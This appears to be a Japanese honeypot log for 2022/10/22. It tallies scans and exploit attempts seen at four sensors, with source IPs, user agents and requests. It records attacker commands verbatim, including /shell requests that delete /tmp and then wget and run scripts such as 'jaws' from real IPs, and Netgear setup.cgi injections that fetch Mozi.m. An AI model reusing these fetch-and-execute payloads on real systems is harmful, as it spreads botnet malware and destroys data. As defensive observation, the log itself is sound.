ハニーポット(仮) 観測記録 2022/10/22分です。
特徴
共通
CensysInspectによるスキャン行為
/.envへのスキャン行為
Location:JP
curlによるスキャン行為
zgrabによるスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 109.206.241.129/666.sh; sh /tmp/666.sh
cd /tmp; rm -rf *; wget 81.161.229.46/jaws; sh /tmp/jaws
Location:US
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
WordPressへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 81.161.229.46/jaws; sh /tmp/jaws
Location:UK
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 81.161.229.46/jaws; sh /tmp/jaws
Location:SG
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Solrへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 81.161.229.46/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:179 (前日比:38)
US:総アクセス数:93 (前日比:1)
UK:総アクセス数:49 (前日比:1)
SG:総アクセス数:76 (前日比:-64)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.127.150.72 | United States |
| 1 | 13.235.63.130 | United States |
| 1 | 45.61.185.198 | United States |
| 1 | 66.240.205.34 | United States |
| 1 | 68.183.53.43 | United States |
| 1 | 77.24.101.229 | Germany |
| 1 | 85.237.194.203 | Poland |
| 1 | 89.171.139.124 | Poland |
| 6 | 95.214.235.205 | Ukraine |
| 1 | 105.159.17.114 | Morocco |
| 126 | 124.195.183.3 | South Korea |
| 9 | 135.125.244.48 | France |
| 7 | 135.125.246.189 | France |
| 4 | 138.68.142.31 | United States |
| 3 | 139.59.56.56 | Singapore |
| 1 | 156.221.17.68 | Egypt |
| 1 | 167.94.146.60 | United States |
| 1 | 172.104.242.173 | United States |
| 5 | 185.254.196.115 | Ukraine |
| 1 | 192.241.217.194 | United States |
| 1 | 192.241.219.62 | United States |
| 1 | 198.235.24.136 | United States |
| 1 | 205.210.31.53 | United States |
| 3 | 207.154.250.105 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 2 | Hello, world |
| 126 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 |
| 29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.61.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad |
||
| 1 | MGLNDD_18.179.20.5_80\n |
||
| 11 | \x16\x03\x01 |
||
| 1 | \xa2W\xc0\xef{U\xd8\x800\x07\xc1\xcb\x01$\x92P |
\xd1L\x14 | |
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 32 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /1phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /2phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 2 | GET | /_phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /_phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /admin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /admin/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /admin/phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /admin/pma/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /admin/web/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/PMA/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /administrator/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/pma/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /administrator/web/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /database/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/db-admin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /db/dbadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/myadmin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /db/phpMyAdmin-3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin-5/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/phpmyadmin3/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/webadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/webdb/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/websql/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /dbadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /myadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/db/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysql/mysqlmanager/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysql/pma/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysql/sqlmanager/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/web/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysqladmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysqlmanager/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /php-myadmin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin-3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin-4.9.10-all-languages/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin-4.9.7/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin-4/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin-5.1.0/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin-5.1.1/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin-5.1.2/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin-5.2.0/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin-5.3.0-all-languages/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin1/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin5.1/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmy-admin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin1/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2011/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2012/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2015/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2016/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2018/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2020/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpmyadmin2021/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin4/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phppma/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+109[.]206[.]241[.]129/666.sh;sh+/tmp/666.sh |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 2 | GET | /sql/myadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/php-myadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpmy-admin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpmyadmin3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpmyadmin5/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpmyadmindex.php?lang=en |
HTTP/1.1 |
| 5 | GET | /sql/sql-admin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/sqlweb/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/webdb/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.227 | Russia |
| 20 | 20.244.117.20 | United States |
| 1 | 42.225.202.90 | China |
| 2 | 45.61.185.198 | United States |
| 2 | 45.227.254.26 | Belize |
| 16 | 51.79.29.48 | Canada |
| 3 | 54.37.79.75 | France |
| 1 | 64.62.197.63 | United States |
| 1 | 65.0.133.127 | United States |
| 4 | 68.183.89.54 | United States |
| 1 | 80.76.51.246 | Bulgaria |
| 7 | 132.145.39.16 | United States |
| 4 | 152.89.196.211 | Russia |
| 1 | 156.216.68.69 | Egypt |
| 2 | 162.142.125.220 | United States |
| 2 | 162.142.125.222 | United States |
| 3 | 164.92.171.196 | United States |
| 3 | 167.99.61.169 | United States |
| 3 | 167.99.78.253 | United States |
| 1 | 171.22.30.97 | Bulgaria |
| 1 | 172.104.242.173 | United States |
| 3 | 183.136.225.35 | China |
| 3 | 188.166.16.227 | United States |
| 1 | 192.241.192.243 | United States |
| 1 | 194.26.29.31 | Russia |
| 1 | 198.235.24.6 | United States |
| 1 | 198.235.24.131 | United States |
| 4 | 202.95.12.122 | Singapore |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 34 | - |
| 3 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.34 |
| 20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 19 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | Python/3.7 aiohttp/3.7.4.post0 |
| 1 | curl/7.61.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | MGLNDD_34.68.118.83_80\n |
||
| 3 | \x03 |
||
| 18 | \x16\x03\x01 |
||
| 1 | \xa2\xa2\xb7\xf9:\xa78z\x7f\xd7\xad\x82\x1a{\xddu*\xef\xfe\x0f\n |
||
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 23 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /2015/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /2016/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /2017/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /2018/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /blog/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /cms/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 6 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /media/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /news/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /php.php |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]225[.]202[.]90:55919/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /shop/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /site/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /sito/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /test.php |
HTTP/1.1 |
| 1 | GET | /test/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /web/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /website/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wordpress/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp1/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp2/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.28.87.68 | United States |
| 1 | 13.232.252.52 | United States |
| 1 | 13.233.212.233 | United States |
| 4 | 27.124.5.24 | Singapore |
| 1 | 36.110.211.66 | China |
| 2 | 36.110.211.69 | China |
| 3 | 36.110.214.194 | China |
| 1 | 42.233.156.28 | China |
| 2 | 45.61.185.198 | United States |
| 2 | 45.227.254.8 | Belize |
| 1 | 64.62.197.7 | United States |
| 1 | 122.194.11.90 | China |
| 2 | 139.59.71.5 | Singapore |
| 3 | 147.182.155.16 | United States |
| 5 | 152.89.196.211 | Russia |
| 1 | 156.200.132.109 | Egypt |
| 5 | 159.203.25.191 | United States |
| 3 | 165.227.115.109 | United States |
| 2 | 167.248.133.119 | United States |
| 2 | 183.136.225.35 | China |
| 1 | 192.241.207.204 | United States |
| 1 | 194.26.29.31 | Russia |
| 1 | 197.32.117.65 | Egypt |
| 1 | 205.210.31.23 | United States |
| 1 | 205.210.31.140 | United States |
| 1 | 209.141.36.231 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 3 | Go-http-client/1.1 |
| 2 | Hello, world |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 4 | Wget/1.21 |
| 2 | curl/7.29.0 |
| 2 | curl/7.61.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad |
||
| 1 | HELP |
||
| 1 | MGLNDD_132.145.66.34_80\n |
||
| 3 | \x03 |
||
| 12 | \x16\x03\x01 |
||
| 1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n |
||
| 1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n |
||
| 3 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /admin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
| 2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /dbadmin/scripts/setup.php |
HTTP/1.1 |
| 5 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /mysql/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin2/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php |
HTTP/1.1 |
| 1 | GET | /pma/scripts/setup.php |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 27.45.12.38 | China |
| 4 | 27.124.32.173 | Singapore |
| 3 | 45.61.185.198 | United States |
| 2 | 45.227.254.26 | Belize |
| 17 | 54.37.79.75 | France |
| 1 | 59.92.173.198 | India |
| 1 | 64.225.55.227 | United States |
| 1 | 66.240.205.34 | United States |
| 2 | 68.183.238.88 | United States |
| 3 | 104.248.198.12 | United States |
| 1 | 117.213.14.244 | India |
| 3 | 142.93.43.247 | United States |
| 1 | 146.66.178.78 | Russia |
| 1 | 149.91.183.211 | United States |
| 5 | 152.89.196.211 | Russia |
| 1 | 156.221.159.171 | Egypt |
| 2 | 162.142.125.213 | United States |
| 2 | 162.142.125.220 | United States |
| 2 | 162.142.125.222 | United States |
| 2 | 167.94.138.61 | United States |
| 10 | 172.104.145.148 | United States |
| 1 | 172.104.242.173 | United States |
| 2 | 183.136.225.35 | China |
| 1 | 184.105.139.102 | United States |
| 1 | 192.241.194.104 | United States |
| 1 | 194.26.29.31 | Russia |
| 1 | 198.235.24.10 | United States |
| 1 | 198.235.24.37 | United States |
| 3 | 206.189.137.166 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 28 | - |
| 4 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
| 1 | TNAS |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad |
||
| 1 | MGLNDD_13.67.44.234_80 |
||
| 3 | \x03 |
||
| 1 | \x14\x12x>\x1fG\xadF\x18u#\rCR` |
||
| 14 | \x16\x03\x01 |
||
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 1 | CONNECT | mkzaim[.]ru:443 |
HTTP/1.1 |
| 18 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 2 | GET | /WAN_wan.htm?.gif |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
| 3 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /fpui/jsp/index.jsp |
HTTP/1.1 |
| 1 | GET | /live_mfg.shtml |
HTTP/1.1 |
| 1 | GET | /module/api.php?mobile/webNasIPS |
HTTP/1.1 |
| 1 | GET | /passwordrecovered.cgi?id=nuclei |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /rootDesc.xml |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]45[.]12[.]38:48491/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /wan.htm |
HTTP/1.1 |
| 1 | GET | /wlsecurity.html |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /getcfg.php |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 4 | PRI | * |
HTTP/2.0 |
